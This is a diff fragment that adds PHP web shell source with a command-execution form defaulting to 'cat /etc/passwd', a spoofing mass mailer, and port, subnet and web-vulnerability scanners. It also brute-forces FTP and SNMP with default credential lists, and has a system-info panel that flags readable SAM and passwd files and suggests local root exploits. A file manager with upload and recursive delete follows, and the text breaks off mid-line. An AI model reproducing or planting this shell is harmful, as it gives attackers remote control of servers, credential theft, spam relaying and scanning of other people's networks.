+echo"</textarea></td></tr><form method=post><tr><td bgcolor='#808080'><input type=text size=91 name=cmd value='";if(!empty($_REQUEST['cmd']))echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows)echo "cat /etc/passwd";echo "'>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor='#808080'><select name='cmd' width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></form>$et</table><center>";
+}
+function maileR(){
+global $msgbox,$et,$hcwd;
+if(!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){
+$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];
+if(mail($to,$subject,$body,"From: $from"))echo "$msgbox<b>Mail sent!</b><br>$et";
+}
+echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'><td><b>Mailer:</b></td></tr><td width='20%' bgcolor='#666666'>SMTP</td><td bgcolor='#666666'>".ini_get('SMTP').' ('.ini_get('smtp_port').")</td></tr><tr><td bgcolor='#808080'>From:</td><td bgcolor='#808080'><input name=from type=text value='evil@hell.gov' size=55>$hcwd</td><tr><td width='25%' bgcolor='#666666'>To:</td><td bgcolor='#666666'><input name=to type=text value='";if(!empty($_ENV['SERVER_ADMIN']))echo $_ENV['SERVER_ADMIN'];else echo 'admin@'.getenv('HTTP_HOST'); echo "' size=55></td></tr><tr><td bgcolor='#808080'>Subject:</td><td bgcolor='#808080'><input name=subject type=text value='' size=55></td><tr><td bgcolor='#666666'>Body:</td><td bgcolor='#666666'><textarea rows='18' cols='43' name=body></textarea></td></tr><tr><td width='10%' bgcolor='#808080'></td><td bgcolor='#808080' align='right'><input type=submit class=buttons value=Send></form>$et";
+}
+function scanneR(){
+global $hcwd,$et;
+if(!empty($_SERVER['SERVER_ADDR']))$host=$_SERVER['SERVER_ADDR'];else $host='127.0.0.1';
+$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
+if(($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
+$target=$_REQUEST['target'];$from=(int)$_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu=0;
+echo '<font color=blue>Port scanning started against '.htmlspecialchars($target).':<br>';
+$start=time();
+for($i=$from;$i<=$to;$i++){
+if($tcp){
+if(checkthisporT($target,$i,$timeout)){
+$nu++;
+$ser='';
+if(getservbyport($i,'tcp'))$ser='('.getservbyport($i,'tcp').')';
+echo "$nu) $i $ser (<a href='telnet://$target:$i'>Connect</a>) [TCP]<br>";
+}
+}
+if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser='';if(getservbyport($i,'udp'))$ser='('.getservbyport($i,'udp').')';echo "$nu) $i $ser [UDP]<br>";}
+}
+$time=time()-$start;
+echo "Done! ($time seconds)</font>";
+}
+elseif(!empty($_REQUEST['securityscanner'])){
+echo '<font color=blue>';
+$start=time();
+$from=$_REQUEST['from'];
+$to=(int)$_REQUEST['to'];
+$timeout=(int)$_REQUEST['timeout'];
+$f=substr($from,strrpos($from,'.')+1);
+$from=substr($from,0,strrpos($from,'.'));
+if(!empty($_REQUEST['httpscanner'])){
+echo 'Loading webserver bug list...';
+$buglist=whereistmP().DIRECTORY_SEPARATOR.uniqid('BL');
+$dl=downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
+if($dl){$file=file($buglist);echo 'Done! scanning started.<br><br>';}else echo 'Failed!!! scanning started without webserver security testing...<br><br>';
+}else{$fr=htmlspecialchars($from);echo "Scanning $fr.$f-$fr.$to:<br><br>";}
+for($i=$f;$i<=$to;$i++){
+$output=0;
+$ip="$from.$i";
+if(!empty($_REQUEST['nslookup'])){
+$hn=gethostbyaddr($ip);
+if($hn!=$ip)echo "$ip [$hn]<br>"; $output=1;}
+if(!empty($_REQUEST['ipscanner'])){
+$port=$_REQUEST['port'];
+if(strstr($port,','))$p=explode(',',$port);else $p[0]=$port;
+$open=$ser='';
+foreach($p as $po){
+$scan=checkthisporT($ip,$po,$timeout);
+if($scan){
+$ser='';
+if($ser=getservbyport($po,'tcp'))$ser="($ser)";
+$open.=" $po$ser ";
+}
+}
+if($open){echo "$ip) Open ports:$open<br>";$output=1;}
+
+}
+if(!empty($_REQUEST['httpbanner'])){
+$res=get_sw_namE($ip,$timeout);
+if($res){
+echo "$ip) Webserver software: ";
+if($res==-1)echo 'Unknow';
+else echo $res;
+echo '<br>';
+$output=1;
+}
+}
+if(!empty($_REQUEST['httpscanner'])){
+if(checkthisporT($ip,80,$timeout) && !empty($file)){
+$admin=array('/admin/','/adm/');
+$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
+$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
+$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
+foreach($file as $v){
+$vuln=array();
+$v=trim($v);
+if(!$v || $v{0}=='#')continue;
+$v=str_replace('","','^',$v);
+$v=str_replace('"','',$v);
+$vuln=explode('^',$v);
+$page=$cqich=$nukech=$adminch=$userch=$vuln[1];
+if(strstr($page,'@CGIDIRS'))
+foreach($cgi as $cg){
+$cqich=str_replace('@CGIDIRS',$cg,$page);
+$url="http://$ip$cqich";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
+}
+elseif(strstr($page,'@ADMINDIRS'))
+foreach($admin as $cg){
+$adminch=str_replace('@ADMINDIRS',$cg,$page);
+$url="http://$ip$adminch";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
+}
+elseif(strstr($page,'@USERS'))
+foreach($users as $cg){
+$userch=str_replace('@USERS',$cg,$page);
+$url="http://$ip$userch";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
+}
+elseif(strstr($page,'@NUKE'))
+foreach($nuke as $cg){
+$nukech=str_replace('@NUKE',$cg,$page);
+$url="http://$ip$nukech";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
+}
+else{
+$url="http://$ip$page";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href='$url' target='_blank'>$url</a><br>";}
+}
+}
+}
+}
+if(!empty($_REQUEST['smtprelay'])){
+if(checkthisporT($ip,25,$timeout)){
+$res='';
+$res=checksmtP($ip,$timeout);
+if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}
+}
+}
+if(!empty($_REQUEST['snmpscanner'])){
+if(checkthisporT($ip,161,$timeout,1)){
+$com=$_REQUEST['com'];
+$coms=$res='';
+if(strstr($com,','))$c=explode(',',$com);else $c[0]=$com;
+foreach($c as $v){
+$ret=snmpchecK($ip,$v,$timeout);
+if($ret)$coms.=" $v ";
+}
+if($coms!=''){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
+}
+}
+if(!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')){
+if(checkthisporT($ip,21,$timeout)){
+$usps=explode(',',$_REQUEST['userpass']);
+foreach($usps as $v){
+$user=substr($v,0,strpos($v,':'));
+$pass=substr($v,strpos($v,':')+1);
+if($pass=='[BLANK]')$pass='';
+$ftp=ftp_connect($ip,21,$timeout);
+if($ftp){
+if(ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) System type: ".ftp_systype($ftp)." (<b><a href='";echo hlinK("seC=ftpc&workingdiR=".getcwd()."&hosT=$ip&useR=$user&pasS=$pass");echo "' target='_blank'>Connect</a></b>)<br>";}
+}
+}
+}
+}
+if($output)echo '<hr size=1 noshade>';
+}
+$time=time()-$start;
+echo "Done! ($time seconds)</font>";
+if(!empty($buglist))unlink($buglist);
+}
+elseif(!empty($_REQUEST['directoryscanner'])){
+$dir=file($_REQUEST['dic']);$host=$_REQUEST['host'];$r=$_REQUEST['r1'];
+echo "<font color=blue><pre>Scanning started...\n";
+for($i=0;$i<count($dir);$i++){
+$d=trim($dir[$i]);
+if($r){
+$adr="http://$host/$d/";
+if(check_urL($adr,'GET','302')){echo "Directory Found: <a href='$adr' target='_blank'>$adr</a>\n";}
+}else{
+$adr="$d.$host";
+$ip=gethostbyname($adr);
+if($ip!=$adr){echo "Subdomain Found: <a href='http://$adr' target='_blank'>$adr($ip)</a>\n";}
+}
+}
+echo 'Done!</pre></font>';
+}
+else{
+$t="<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'";
+$chbox=(extension_loaded('sockets'))?"<input type=checkbox style='border-width:1px;background-color:#808080;' name=tcp value=1 checked>TCP<input type=checkbox name=udp style='border-width:1px;background-color:#808080;' value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
+echo "<center>$t><td>Port scanner:</td></tr><td width='25%' bgcolor='#808080'>Target:</td><td bgcolor='#808080' width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor='#666666' width=25%>From:</td><td bgcolor='#666666' width=25%><input name=fromport type=text value='1' size=5></td></tr><tr><td bgcolor='#808080' width=25%>To:</td><td bgcolor='#808080' width=25%><input name=toport type=text value='1024' size=5></td></tr><tr><td width='25%' bgcolor='#666666'>Timeout:</td><td bgcolor='#666666'><input name=timeout type=text value='2' size=5></td><tr><td width='25%' bgcolor='#808080'>$chbox</td><td bgcolor='#808080' align='right'>$hcwd<input type=submit class=buttons name=portscanner value=Scan></form>$et$t><td>Discoverer:</td></tr><tr><td width='25%' bgcolor='#808080'>Host:</td><td bgcolor='#808080' width=80%><input name=host value='".$_SERVER["HTTP_HOST"]."' size=40></td><td bgcolor='#808080'></td></tr><tr><td width='25%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width=80%><input name=dic size=40></td><td bgcolor='#666666'></td></tr><tr><td width='25%' bgcolor='#808080'>Search for:</td><td bgcolor='#808080' width=40%><input type=radio value=1 checked name=r1>Directories<input type=radio name=r1 value=0>Subdomains</td><td bgcolor='#808080' align='right' width=40%><input type=submit class=buttons name=directoryscanner value=Scan></td></form></tr></table>";
+$host=substr($host,0,strrpos($host,"."));
+echo "$t name=security><td>Security scanner:</td></tr><td width='25%' bgcolor='#808080'>From:</td><td bgcolor='#808080' width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style='border-width:1px;background-color:#808080;' name=nslookup checked>NS lookup</td></tr><tr><td bgcolor='#666666' width=25%>To:</td><td bgcolor='#666666' width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width='25%' bgcolor='#808080'>Timeout:</td><td bgcolor='#808080'><input name=timeout type=text value='2' size=5></td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ipscanner value=1 checked onClick='document.security.port.disabled = !document.security.port.disabled;' style='border-width:1px;background-color:#666666;'>Port scanner:</td><td bgcolor='#666666'><input name=port type=text value='21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=httpbanner value=1 checked style='border-width:1px;background-color:#808080;'>Get web banner</td><td bgcolor='#808080'><input type=checkbox name=httpscanner value=1 checked style='border-width:1px;background-color:#808080;'>Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style='border-width:1px;background-color:#808080;'>SMTP relay check</td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ftpscanner value=1 checked onClick='document.security.userpass.disabled = !document.security.userpass.disabled;' style='border-width:1px;background-color:#666666;'>FTP password:</td><td bgcolor='#666666'><input name=userpass type=text value='anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=snmpscanner value=1 onClick='document.security.com.disabled = !document.security.com.disabled;' checked style='border-width:1px;background-color:#808080;'>SNMP:</td><td bgcolor='#808080'><input name=com type=text value='public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,NoGaH$@!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes' size=60></td></tr><tr><td width='25%' bgcolor='#666666'></td><td bgcolor='#666666' align='right'><input type=submit class=buttons name=securityscanner value=Scan></form>$et";
+}
+}
+function sysinfO(){
+global $windows,$disablefunctions,$cwd,$safemode;
+$t8="<td width='25%' bgcolor='#808080'>";
+$t6="<td width='25%' bgcolor='#666666'>";
+$mil="<a target='_blank' href='http://www.milw0rm.org/related.php?program=";
+$basedir=(ini_get('open_basedir') || strtoupper(ini_get('open_basedir'))=='ON')?'ON':'OFF';
+if(!empty($_SERVER['PROCESSOR_IDENTIFIER']))$CPU=$_SERVER['PROCESSOR_IDENTIFIER'];
+$osver=$tsize=$fsize='';
+$ds=implode(' ',$disablefunctions);
+if($windows){
+$osver=' ('.shelL('ver').')';
+$sysroot=shelL("echo %systemroot%");
+if(empty($sysroot))$sysroot=$_SERVER['SystemRoot'];
+if(empty($sysroot))$sysroot = getenv('windir');
+if(empty($sysroot))$sysroot = 'Not Found';
+if(empty($CPU))$CPU=shelL('echo %PROCESSOR_IDENTIFIER%');
+for($i=66;$i<=90;$i++){
+$drive=chr($i).':\\';
+if(is_dir($drive)){
+$fsize+=disk_free_space($drive);
+$tsize+=disk_total_space($drive);
+}
+}
+}else{
+$ap=shelL('whereis apache');
+if(!$ap)$ap='Unknow';
+$fsize=disk_free_space('/');
+$tsize=disk_total_space('/');
+}
+$xpl=rootxpL();if(!$xpl)$xpl='Not found.';
+$disksize='Used spase: '.showsizE($tsize-$fsize).' Free space: '.showsizE($fsize).' Total space: '.showsizE($tsize);
+if(empty($CPU))$CPU='Unknow';
+$os=php_uname();
+$osn=php_uname('s');
+if(!$windows){
+$ker=php_uname('r');
+$o=($osn=='Linux')?'Linux+Kernel':$osn;
+$os=str_replace($osn,"${mil}$o'>$osn</a>",$os);
+$os=str_replace($ker,"${mil}Linux+Kernel'>$ker</a>",$os);
+$inpa=':';
+}else{
+$sam=$sysroot."\\system32\\config\\SAM";
+$inpa=';';
+$os=str_replace($osn,"${mil}MS+Windows'>$osn</a>",$os);
+}
+$cuser=get_current_user();
+if(!$cuser)$cuser='Unknow';
+$software=str_replace('Apache',"${mil}Apache'>Apache</a>",$_SERVER['SERVER_SOFTWARE']);
+echo "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td>Server information:</td></tr><tr>${t6}Server:</td><td bgcolor='#666666'>".$_SERVER['HTTP_HOST'];if(!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr>${t8}Operation system:</td><td bgcolor='#808080'>$os$osver</td></tr><tr>${t6}Web server application:</td><td bgcolor='#666666'>$software</td></tr><tr>${t8}CPU:</td><td bgcolor='#808080'>$CPU</td></tr>${t6}Disk status:</td><td bgcolor='#666666'>$disksize</td></tr><tr>${t8}User domain:</td><td bgcolor='#808080'>";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr>${t6}User name:</td><td bgcolor='#666666'>$cuser</td></tr>";
+if($windows){
+echo "<tr>${t8}Windows directory:</td><td bgcolor='#808080'><a href='".hlinK("seC=fm&workingdiR=$sysroot")."'>$sysroot</a></td></tr><tr>${t6}Sam file:</td><td bgcolor='#666666'>";if(is_readable(($sam)))echo "<a href='".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."'>Readable</a>"; else echo 'Not readable';echo '</td></tr>';
+}
+else
+{
+echo "<tr>${t8}UID - GID:</td><td bgcolor='#808080'>".getmyuid().' - '.getmygid()."</td></tr><tr>${t6}Recommended local root exploits:</td><td bgcolor='#666666'>$xpl</td></tr><tr>${t8}Passwd file:</td><td bgcolor='#808080'>";
+if(is_readable('/etc/passwd'))echo "<a href='".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."'>Readable</a>";else echo'Not readable';echo "</td></tr><tr>${t6}${mil}cpanel'>cPanel</a>:</td><td bgcolor='#666666'>";$cp='/usr/local/cpanel/version';$cv=(file_exists($cp) && is_writable($cp))?trim(file_get_contents($cp)):'Unknow';echo "$cv (Log file: ";
+if(file_exists('/var/cpanel/accounting.log')){if(is_readable('/var/cpanel/accounting.log'))echo "<a href='".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."'>Readable</a>";else echo 'Not readable';}else echo 'Not found';echo ')</td></tr>';
+}
+echo "<tr>$t8${mil}PHP'>PHP</a> version:</td><td bgcolor='#808080'><a href='?=".php_logo_guid()."' target='_blank'>".PHP_VERSION."</a> (<a href='".hlinK("seC=phpinfo&workingdiR=$cwd")."'>more...</a>)</td></tr><tr>${t6}Zend version:</td><td bgcolor='#666666'>";if (function_exists('zend_version')) echo "<a href='?=".zend_logo_guid()."' target='_blank'>".zend_version().'</a>';else echo 'Not Found';echo "</td><tr>${t8}Include path:</td><td bgcolor='#808080'>".str_replace($inpa,' ',DEFAULT_INCLUDE_PATH)."</td><tr>${t6}PHP Modules:</td><td bgcolor='#666666'>";$ext=get_loaded_extensions();foreach($ext as $v){$i=phpversion($v);if(!empty($i))$i="($i)";$l=hlinK("exT=$v");echo "<a href='javascript:void(0)' onclick=\"window.open('$l','','width=300,height=200,scrollbars=yes')\">$v</a> $i ";}echo "</td><tr>${t8}Disabled functions:</td><td bgcolor='#808080'>";if(!empty($ds))echo "$ds ";else echo 'Nothing'; echo"</td></tr><tr>${t6}Safe mode:</td><td bgcolor='#666666'>$safemode</td></tr><tr>${t8}Open base dir:</td><td bgcolor='#808080'>$basedir</td></tr><tr>${t6}DBMS:</td><td bgcolor='#666666'>";$sq='';if(function_exists('mysql_connect')) $sq= "${mil}MySQL'>MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL'>MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle'>Oracle</a> ";if(function_exists('sqlite_open')) $sq.= ' SQLite ';if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL'>PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= ' mSQL ';if(function_exists('mysqli_connect'))$sq.= ' MySQLi ';if(function_exists('ovrimos_connect')) $sq.= ' Ovrimos SQL ';if ($sq=='') $sq= 'Nothing'; echo "$sq</td></tr></table>";
+}
+function checksuM($file){
+global $et;
+echo "<table border=0 style='border-collapse: collapse' width='100%'><tr><td width='10%' bgcolor='#666666'><b>MD5:</b> <font color=#F0F0F0>".md5_file($file).'</font><br><b>SHA1:</b><font color=#F0F0F0>'.sha1_file($file)."</font>$et";
+}
+function listdiR($cwd,$task){
+$c=getcwd();
+$dh=opendir($cwd);
+while($cont=readdir($dh)){
+if($cont=='.' || $cont=='..')continue;
+$adr=$cwd.DIRECTORY_SEPARATOR.$cont;
+switch($task){
+case '0':if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break;
+case '1':if(is_writeable($adr)){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break;
+case '2':if(is_file($adr) && is_writeable($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";break;
+case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break;
+case '4':if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";break;
+case '5':if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break;
+case '6':if(preg_match('@'.$_REQUEST['search'].'@',$cont) || (is_file($adr) && preg_match('@'.$_REQUEST['search'].'@',file_get_contents($adr)))){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break;
+case '7':if(strstr($cont,$_REQUEST['search']) || (is_file($adr) && strstr(file_get_contents($adr),$_REQUEST['search']))){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break;
+case '8':{if(is_dir($adr))rmdir($adr);else unlink($adr);rmdir($cwd);break;}
+}
+if(is_dir($adr))listdiR($adr,$task);
+}
+}
+if(!checkfunctioN('posix_getpwuid')){function posix_getpwuid($u){return 0;}}
+if(!checkfunctioN('posix_getgrgid')){function posix_getgrgid($g){return 0;}}
+function filemanageR(){
+global $windows,$msgbox,$errorbox,$t,$et,$cwd,$hcwd;
+$table="<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'>";
+$td1n="<td width='22%' bgcolor='#666666'>";
+$td2m="<td width='22%' bgcolor='#808080'>";
+$td1i="<td width='5%' bgcolor='#666666'>";
+$td2i="<td width='5%' bgcolor='#808080'>";
+$tdnr="<td width='22%' bgcolor='#800000'>";
+$tdw="<td width='22%' bgcolor='#006E00'>";
+if(!empty($_REQUEST['task'])){
+if(!empty($_REQUEST['search']))$_REQUEST['task']=7;
+if(!empty($_REQUEST['re']))$_REQUEST['task']=6;
+echo '<font color=blue><pre>';
+listdiR($cwd,$_REQUEST['task']);
+echo '</pre></font>';
+}else{
+if(!empty($_REQUEST['cP']) || !empty($_REQUEST['mV']) || !empty($_REQUEST['rN'])){
+if(!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){
+$title='Destination';
+$ad=(!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];
+$dis=(!empty($_REQUEST['cP']))?'Copy':'Move';
+}else{
+$ad=$_REQUEST['rN'];
+$title='New name';
+$dis='Rename';
+}
+if(!!empty($_REQUEST['deS'])){
+echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='100%' bgcolor='#333333'>$title:</td></tr><tr>$td1n<form method='POST'><input type=text value='";if(empty($_REQUEST['rN']))echo $cwd;echo "' size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value='".htmlspecialchars($ad)."' name=cp><input class=buttons type=submit value=$dis></form>$et</center>";
+}else{
+if(!empty($_REQUEST['rN']))rename($ad,$_REQUEST['deS']);
+else{
+copy($ad,$_REQUEST['deS']);
+if(!empty($_REQUEST['mV']))unlink($ad);
+}
+}
+}
+if(!empty($_REQUEST['deL'])){if(is_dir($_REQUEST['deL']))listdiR($_REQUEST['deL'],8);else unlink($_REQUEST['deL']);}
+if(!empty($_FILES['uploadfile'])){
+move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);
+echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>";
+}
+$select="<select onChange='document.location=this.options[this.selectedIndex].value;'><option value='".hlinK("seC=fm&workingdiR=$cwd")."'>--------</option><option value='";
+if(!empty($_REQUEST['newf'])){
+if(!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],'');}
+if(!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);}
+}
+if($windows){
+echo "$table<td><b>Drives:</b> ";
+for($i=66;$i<=90;$i++){$drive=chr($i).':';
+if(is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title='$vol' href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";}
+}
+echo $et;
+}
+echo "$table<form method='POST'><tr><td width='20%'><b>[ <a id='lk' style='text-decoration:none' href='#' onClick=\"HS('div');\">-</a> ] Location:</b><input type=text name=workingdiR size=135 value='$cwd'><input class=buttons type=submit value=Change></form>$et";
+$file=$dir=$link=array();
+if($dirhandle=opendir($cwd)){
+while($cont=readdir($dirhandle)){
+if(is_dir($cwd.DIRECTORY_SEPARATOR.$cont))$dir[]=$cont;
+elseif(is_file($cwd.DIRECTORY_SEPARATOR.$cont))$file[]=$cont;
+else $link[]=$cont;
+}
+closedir($dirhandle);
+sort($file);sort($dir);sort($link);
+echo "<div id='div'><table border=1 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bordercolor='#282828' bgcolor='#333333' width='100%'><tr><td width='30%' bgcolor='#333333' align='center'>Name</td><td width='13%' bgcolor='#333333' align='center'>Owner</td><td width='12%' bgcolor='#333333' align='center'>Modification time</td><td width='12%' bgcolor='#333333' align='center'>Last change</td><td width='5%' bgcolor='#333333' align='center'>Info</td><td width='7%' bgcolor='#333333' align='center'>Size</td><td width='15%' bgcolor='#333333' align='center'>Actions</td></tr>";
+$i=0;
+foreach($dir as $dn){
+echo '<tr>';
+$i++;
+$own='Unknow';
+$owner=posix_getpwuid(fileowner($dn));
+$mdate=date('Y/m/d H:i:s',filemtime($dn));
+$adate=date('Y/m/d H:i:s',fileatime($dn));
+$diraction=$select.hlinK('seC=fm&workingdiR='.realpath($dn))."'>Open</option><option value='".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."'>Rename</option><option value='".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."'>Remove</option></select></td>"; +if($owner)$own="<a title=' Shell: ".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>'; +if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if(is_writeable($dn))echo $tdw;elseif(!is_readable($dn))echo $tdnr;else echo $cl2; +echo "<a href='".hlinK('seC=fm&workingdiR='.realpath($dn))."'>"; +if(strlen($dn)>45)echo substr($dn,0,42).'...';else echo $dn;echo '</a>'; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>$cl1";echo "<a href='#' onClick=\"javascript:chmoD('$dn')\" title='Change mode'>";echo 'D';if(is_readable($dn))echo 'R';if(is_writeable($dn))echo 'W';echo '</a></td>'; +echo "$cl1------</td>"; +echo $cl2.$diraction; +echo '</tr>'; +} +foreach($file as $fn){ +echo '<tr>'; +$i++; +$own='Unknow'; +$owner=posix_getpwuid(fileowner($fn)); +$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>Open</option><option value='".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."'>Edit</option><option value='".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."'>Download</option><option value='".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."'>Hex view</option><option value='".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."'>Image</option><option value='".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."'>Include</option><option value='".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."'>Checksum</option><option value='".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."'>Copy</option><option value='".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."'>Move</option><option value='".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."'>Remove</option></select></td>"; +$mdate=date('Y/m/d H:i:s',filemtime($fn)); +$adate=date('Y/m/d H:i:s',fileatime($fn)); +if($owner)$own="<a 
